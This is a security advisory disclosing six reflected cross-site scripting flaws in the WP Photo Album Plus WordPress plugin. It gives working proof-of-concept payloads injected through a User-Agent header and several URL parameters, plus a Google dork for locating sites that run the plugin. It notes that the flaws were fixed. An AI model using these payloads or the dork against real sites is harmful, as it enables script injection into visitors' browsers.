WP Photo Album Plus Security Vulnerabilities

Author: Milhouse 
Download: https://wordpress.org/plugins/wp-photo-album-plus/
Home Page: http://wppa.opajaap.nl/
Google dork: inurl:wp-content/plugins/wp-photo-album-plus

Set up:
Wordpress Version: 3.9.1, 3.9.2
WP Photo Album Plus version: 5.4.4, 5.4.3
Client browsers: FireFox 31, Internet Explorer 8-11

Issue number 1: A Cross-Site Scripting (reflective) vulnerability.
Details:
The plugin echoes the value of  the http header “User-Agent” back to the client browser. Allowing un-sanitized java script to be inserted. 

Severity: Low

Proof of Concept (POC):
Request:
GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) 47b5a--><script>alert(1)</script>0aa96
Accept-Encoding: gzip, deflate
Host: <vulnerablesite.example>
DNT: 1
Proxy-Connection: Keep-Alive
Pragma: no-cache

Issue number 2: A Cross-site Scripting (reflective)vulnerability.

Details:
The value of the wppa-album parameter is inserted into a java script string. A supplied payload in the wppa-album parameter is echoed back unmodified to the client browser.

Severity: High

Proof of Concept (POC):
http://vulnerablesite.example/?page_id=109&wppa- album=0178d4<%2fscript><script>alert(1)<%2fscript>75f6e&wppa-cover=0&wppa- occur=1&wppa-tag=

Issue number 3: Cross-Site Scripting (Reflective) Vulnerability. 

Severity: High

Details:
The supplied value of the request parameter wppa-lasten is vulnerable to cross-site scripting. By using an event handler such as “onmouseover” it is possible to insert arbitrary JavaScript into the page.

Proof of concept (POC):
http://vulnerablesite.example/?wppa-occur=1&wppa- lasten=102dbdd"%20onmouseover%3dalert(1)%20fd679&page_id=10&wppa- album=0&wppa-photo=2

Issue number 4: Cross-Site Scripting (Refective) vulnerability 

Severity: High

Details:
The value supplied to the wppa-searchstring parameter is copied into the value of a HTML tag attribute. It is possible to use a style attribute to introduce arbitrary JavaScript in the applications response.

Proof of Concept (POC): http://vulnerablesite.example/?page_id=110&wppa-search-submit=wppa-search- submit%3dSearch&wppa- searchstring=cd84d"style%3d"behavior%3aurl(%23default%23time2)"onbegin%3d"alert (1)"3b512b44ea8&wppa-searchroot=

Issue number 5: Cross-Site Scripting (reflective) 

Severity: High

Details:
This is similar to issue three. The value supplied to the wppa-topten parameter is inserted into the value of a HTML tag attribute. By using an event handler such as “onmouseover” it is possible to inject arbitrary JavaScript into the page.

Proof of Concept:
http://vulnerablesite.example/?wppa-occur=1&wppa- topten=10eb700"%20onmouseover%3dalert(1)%203c53f&&page_id=12&wppa- album=0&wppa-photo=2

Issue: Cross-Site Scripting (Reflective) Vulnerability.

Severity: High

Detail:
This is similar to issue number four. The value supplied to the s (search) parameter is copied into the value of a HTML tag attribute. It is possible to use a style attribute to introduce arbitrary JavaScript in the applications response. The plugin seems to use the value of s (search) for the same value of wppa-searchstring.

Proof of Concept: http://vulnerablesite.example/?s=7d0ba"style%3d"behavior%3aurl(%23default%23time2 )"onbegin%3d"alert(1)"3924b

Resolution: 
Developer fixed the issues immediately after disclosure. Update the plugin to the latest version.